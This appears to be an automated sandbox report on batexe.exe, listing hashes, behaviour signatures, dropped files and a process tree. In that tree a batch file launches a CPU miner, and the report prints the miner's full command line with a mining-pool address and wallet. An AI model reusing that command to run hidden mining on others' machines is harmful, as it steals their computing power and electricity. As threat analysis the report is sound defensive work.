73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
297s
max time network
299s
platform
windows10-1703_x64
resource
win10-20231215-ja
resource tags

arch:x64arch:x86image:win10-20231215-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
12/02/2024, 04:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
4500	b2e.exe
1596	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
1596	cpuminer-sse2.exe
1596	cpuminer-sse2.exe
1596	cpuminer-sse2.exe
1596	cpuminer-sse2.exe
1596	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/5024-6-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 5024 wrote to memory of 4500	5024	batexe.exe	74
PID 5024 wrote to memory of 4500	5024	batexe.exe	74
PID 5024 wrote to memory of 4500	5024	batexe.exe	74
PID 4500 wrote to memory of 3088	4500	b2e.exe	75
PID 4500 wrote to memory of 3088	4500	b2e.exe	75
PID 4500 wrote to memory of 3088	4500	b2e.exe	75
PID 3088 wrote to memory of 1596	3088	cmd.exe	78
PID 3088 wrote to memory of 1596	3088	cmd.exe	78

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:5024
- C:\Users\Admin\AppData\Local\Temp\177B.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\177B.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\177B.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4500
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1E51.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3088
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1596

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\177B.tmp\b2e.exe

Filesize
2.5MB

MD5
4b379a1618c68e2048f8f84d1735ba9d

SHA1
3ed48b0bb9524e24133bcc42d36d3ff8822d11d6

SHA256
f3ba0a5a4f6672de1002a554631e0a593dcfe4b5e1433f0c497d3ac740279d4c

SHA512
7198243303c5f95ab8bba9d9edbe9550a8b443583fe0cece8608ba4fe18a67374a670c5af3f766b6de47d2cc88d1dd18a5288faf5859b67f391bebe953b4eaf4

Download Submit
C:\Users\Admin\AppData\Local\Temp\177B.tmp\b2e.exe

Filesize
1.2MB

MD5
f4eb47917b1ade7a35ca23f7d23db01b

SHA1
a7fe9d27695af96fbc1416af94125dff56da2da6

SHA256
bfec1b8707d1181e05b226250b293e8f2261a2a1df28ad84dc99aa7b2e0a64e4

SHA512
69c1cd1a4300118714d118e77c2cb01498cb035110fad58d57474d826908b732bd7dfe9b597a984c3127be8e4e643dbb322a44dc305797f7ddc217a3d5f81ca0

Download Submit
C:\Users\Admin\AppData\Local\Temp\1E51.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
148KB

MD5
5d5c8cadeb0c86c19dd998debafbc073

SHA1
5f3ddf7b46e76405469028fe45f9faf6d73dcfa3

SHA256
4b4c4f807a91c56012ab712d1dc658f406211aa04f24c849511030df2f12699a

SHA512
40ab304c514f6505de20a4e670e58b0f1b3c3ddf19551773800de7d68dc9622c9c3f7967da88ca300123fad61c89eeb77b582226f4a6dcbe736be73676b1dca6

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
115KB

MD5
22bcaafcc39bca47d29e640539d00978

SHA1
e44818989f925e3254cd526f326799ead1483a6e

SHA256
8ea0964fc2ab938f85191dc55acb014e79a2cadf63cc05ea16066742eb7f76f5

SHA512
aee3bbb13c204531fbb74b8d0ce8814f47f1939e8a320fd59b84bbf169d42ab3c5fea6962f60c06c004b598869e3a3c6b2d81af4a63789cc2166e26ba6ece420

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
108KB

MD5
175a90804c2c3e717556593c4d729b6a

SHA1
e5ff38341a4f3175e483233441aac46fbbf914df

SHA256
1f831afdd3aa2e71a7edf09981ce9bbc2a029e30282944c1de863415b60d1e0b

SHA512
4aec2b33c78cb2e21aa31a0b1304b09d31979db4ebc4819a05434aaed383e0be0c97ecc9ae48634c46ee00e122bcc349782b42a5912aa36e7b1f6046b74f61a8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
85KB

MD5
d1532ad51363d2483131885d2fda514b

SHA1
8d5043949de416bf6dd72ff85d3e531ffcc3c0d7

SHA256
c0acade119b9e8cfa0362317c03c8c19b1fe9a3ad4557e0036f2506827569b38

SHA512
3b2c6d042849a5b2a8f899dd1c0624327b41f457e550664d3383ae2375db66272dc729cee2418db9b1118f0d317498c4fac28d9929b90de96ae3d6bbba27962b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
192KB

MD5
62069650d62f76a4cdf0e81172d99993

SHA1
3b20ec5b4a4320ee15b0f7b9715a9ab90f68346e

SHA256
779a5590c667d9a704b79e159259c0646737394fd66a9c0b12d13f9445ca091c

SHA512
ae1954a84fb7543465e77a4cd5cc1bdeee0cf848592958633e6c51702b42131daae64c302d5c9537c59a9b3ba9498e5bf913d1f6f757ccdb8c4183b33224852b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
266KB

MD5
526db6e4b232eb51d744b850bfe2801c

SHA1
112b1e37a97c8a19acfa802d4f345a79c45b3e20

SHA256
a67b0b631c9718a881782126e284dec380fde3f6a1b5ae8c6bbc82358f71188f

SHA512
f18c86833e0156b5f7fa8c493f480b8c366858dc207e4f409f71901b0e30e8b0d793fccfa505d37443dc6fc04e21622dd5b35760c887ccc60818b1f7147d54a9

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
78KB

MD5
7b28978b32c445a74e2c259b7aa8ffca

SHA1
31aed9b0797b5a777cff0e13479d58a13330c568

SHA256
178c2a13abe72d074b1aeede009e3fbcd234d36e325190094769758369dbc4bd

SHA512
de0a7d69b94b9549b37e9a3ccdf4d52fd1d894a73bbb20b36da4b2c2ad92fff640bd5c0e9b3dc0aa5da3cb99d375b21c4c41dd2124e36f6a4f0d4c62133427c8

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1KB

MD5
0c379337a4b2f31244e1ae54499e83c4

SHA1
37dfa19ac4cf7f59fcc631d6e4aab88ef571651b

SHA256
a936fc37f5f987ae446a403c61a064835e7c759dd50c68c8a60530f83cc77580

SHA512
79945f6de4f2bc64933ec2bfb8afee1a1e88d0688a10a4a3c3e517ffeeb7d756f25478083b44bac46f35b0ec5c16f26bc4bd4820deaa3f2d4fb4654b9c21b9dc

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1KB

MD5
7afca165eb598c56e10ab965bb8846ac

SHA1
ec4f2164d7fd2e3a9ef14f6de528a322173a9453

SHA256
555ac9bea13abc8011c591542b66c78024aa8f18c80f5a0114d5200a8b17730f

SHA512
d747e3aae86c96e7821538575d6d5a810125f584f80d4404b3dae3aea0afae5ddfd3b353b6cc7cc4bf40e30c1c2b2f88eacce19cab10e142ff9998a910f179cb

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
28KB

MD5
8911bead40caade65ec6acf9438c28ff

SHA1
d69df011ca61bf7303547187cc31fdfd9d6d476b

SHA256
80e32c8418557dd462531cb6fa4bf212a0b8eab300aab77586ce80a61c00434d

SHA512
7190eee1bc9752b45e3523990b351b74066b1f3309c6a5b5880e27aee01003c2b5c336ad3b7e1e13d7738237a0664d353dc51fecba09a4dd65fca2c58e6d276d

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
213KB

MD5
10a9d382c85125a482ca8a362edf9696

SHA1
2317a94446af0d75836703c529097c936afe214d

SHA256
208f66dc79eb68dbe193d3d828f876e326ef97d892939f6d2e7534ad0878f64e

SHA512
3d61167ade5ed5f0416f56b28ba1e2b456f7ac31b079fece71dfb7d60c5f101d6fc8e8f2ded449af1bb78100faf61c7fd7f7ec17d8387e9ac450f7d03f757fe0

Download Submit
memory/1596-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1596-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1596-42-0x0000000061B90000-0x0000000061C28000-memory.dmp

Filesize
608KB

Download
memory/1596-43-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/1596-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/1596-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1596-44-0x0000000000EE0000-0x0000000002795000-memory.dmp

Filesize
24.7MB

Download
memory/1596-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1596-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1596-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1596-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1596-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1596-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1596-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4500-5-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4500-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/5024-6-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download